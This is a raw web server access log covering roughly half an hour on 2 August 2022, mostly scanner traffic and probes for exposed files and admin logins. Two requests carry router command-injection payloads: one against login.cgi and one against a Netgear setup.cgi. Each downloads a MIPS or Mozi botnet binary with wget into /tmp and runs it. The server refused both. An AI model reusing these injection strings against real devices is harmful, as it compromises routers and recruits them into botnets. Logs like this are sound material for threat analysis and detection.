185.7.214.104 - - [02/Aug/2022:04:32:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
163.123.143.71 - - [02/Aug/2022:04:33:26 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.7.214.104 - - [02/Aug/2022:04:34:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
65.49.20.80 - - [02/Aug/2022:04:36:07 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
185.7.214.104 - - [02/Aug/2022:04:36:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
64.62.197.77 - - [02/Aug/2022:04:41:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
13.51.13.155 - - [02/Aug/2022:04:47:43 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 4.4.2; SAMSUNG-SM-T537A Build/KOT49H) AppleWebKit/537.36 (KHTML like Gecko) Chrome/35.0.1916.141 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:04:48:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.148.10.81 - - [02/Aug/2022:04:48:28 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
192.241.236.86 - - [02/Aug/2022:04:49:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
64.62.197.2 - - [02/Aug/2022:04:50:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
192.241.236.86 - - [02/Aug/2022:04:50:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.236.86 - - [02/Aug/2022:04:50:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.236.86 - - [02/Aug/2022:04:50:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.7.214.104 - - [02/Aug/2022:04:50:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
138.229.236.137 - - [02/Aug/2022:04:51:07 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
192.241.236.86 - - [02/Aug/2022:04:51:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.236.86 - - [02/Aug/2022:04:51:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
2.57.122.98 - - [02/Aug/2022:04:52:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
192.241.236.86 - - [02/Aug/2022:04:52:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.236.86 - - [02/Aug/2022:04:52:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.236.86 - - [02/Aug/2022:04:52:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.7.214.104 - - [02/Aug/2022:04:53:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
175.107.1.208 - - [02/Aug/2022:04:55:55 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://175.107.1.208:47561/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
2.57.122.98 - - [02/Aug/2022:04:56:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.7.214.104 - - [02/Aug/2022:04:58:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
